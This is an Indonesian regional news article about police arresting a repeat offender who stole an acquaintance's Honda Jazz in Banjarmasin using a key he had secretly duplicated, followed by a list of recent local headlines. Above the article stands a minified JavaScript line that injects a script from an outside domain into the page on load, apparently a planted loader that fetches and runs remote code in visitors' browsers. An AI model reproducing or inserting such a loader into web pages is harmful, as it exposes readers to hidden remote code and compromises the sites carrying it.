(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kriminal Banjarmasin

Curi Mobil Modus Duplikat Kunci, NY Diringkus Satreskrim Polresta Banjarmasin


KANALKALIMANTAN.COM, BANJARMASIN – Satuan Reskrim Polresta Banjarmasin meringkus seseorang lelaki berinisial NY (37) karena melakukan pencurian sebuah mobil milik seorang perempuan yang masih kenalan pelaku.

Kasat Reskrim Polreta Banjarmasin, Kompol Thomas Afrian mengungkapkan NY berhasil ditangkap, pada Rabu (1/5/2024) di Jalan Handil Bakti, Semangat Dalam, Kabupaten Barito Kuala (Batola).

Sementara pencurian terjadi di Jalan Pangeran Antasari Kecamatan Banjarmasin Tengah Kota Banjarmasin pada Jumat (26/4/2024).

Baca juga: Resmi Ditetapkan, Ini 45 Calon Terpilih Anggota DPRD Banjarmasin 2024-2029

Thomas membeberkan modus NY melakukan pencurian yaitu dengan melakukan duplikasi kunci mobil milik WRN (42).

Kronologis kejadian, berawal pada Kamis (7/3/2024), pelaku kata Thomas sempat meminjam mobil WRN, dan saat meminjam tersebut NY melakukan duplikasi kunci mobil WRN.

Kesempatan NY membawa kabur mobil WRN berhasil dilakukan pada Jumat (26/4/2024) sekitar pukul 23.00 Wita, dimana pelaku tak sengaja bertemu dengan korban di salah satu THM di Kota Banjarmasin dan bertegur sapa.

Baca juga: Tiga Putra HSU Terbaik Pertama Syarhil Qur’an MTQ XXXV Kalsel

Pada pertemuan itulah NY yang merupakan residivis ranmormembawa kabur mobil Honda Jazz milik WRN.

“Saat melihat WRN, pelaku pulang ke rumah untuk mengambil kunci duplikat mobil yang sudah disiapkan, kemudian langsung ke parkiran tempat hiburan malam dan mengincar mobil milik korban tersebut,” ujar Thomas.

Lanjut Thomas, kasus tersebut terungkap ketika WRN membuat laporan resmi ke Polresta Banjarmasin. Tidak lama polisi berhasil meringkus pelaku di kediamannya, kawasan Handil Bakti, Batola.

Baca juga: Sebelum Dilantik, 30 Calon Terpilih DPRD Banjarbaru Harus Lapor Harta Kekayaan

Sementara barang bukti mobil Honda Jazz itu berhasil diamankan petugas di tempat pelaku menyembunyikan tepatnya di bawah jembatan Pangeran, Kecamatan Banjarmasin Utara.

Saat penangkapan pelaku di rumahnya kawasan Handil Bakti kata Thomas, polisi mendapati barang bukti lain srbuah kunci mobil, STNK, topi, serta sejumlah plat nomor polisi (nopol) kendaraan.

Pelaku NY yang merupakan residivis kasus yang sama itupun kini diancam dengan jeratan pasal 363 KUHP tentang pencurian dengan pemberatan. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Muhammad Andi

Recent Posts

Begini Penjelasan Disporabudpar Banjarbaru Soal Perizinan Hotel Aeris

KANALKALIMANTAN.COM, BANJARBARU – Sebuah hotel baru di ruas Jalan Panglima Batur Banjarbaru akan melakukan soft… Read More

2 jam ago

Gerilya Politik Lisa Halaby ke Nasdem Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU – Langkah politik Erna Lisa Halaby mencari partai politik pengusung dalam Pemilihan Wali… Read More

2 jam ago

Tim Wasev Cek Langsung Lokasi TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana bersama Tim Pengawas… Read More

3 jam ago

Lutung Tersengat Listrik Dievakuasi Warga, Damkar HSU Amankan Satwa Dilindungi

KANALKALIMANTAN.COM, AMUNTAI - Tersengat aliran listrik bertegangan tinggi, seekor satwa dilindungi lutung terkapar berhasil dievakuasi… Read More

4 jam ago

“Pesta Siswa Literasi Digital” di Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN - Teknologi yang saat ini berkembang sangat pesat dan cepat telah membuat perubahan… Read More

4 jam ago

Kontestasi Pilwali Banjarbaru, Golkar Partai Pertama Incaran Lisa Halaby

Lisa Halaby: Saya Siap, Insyaallah Mundur Sebagai ASN Read More

5 jam ago

This website uses cookies.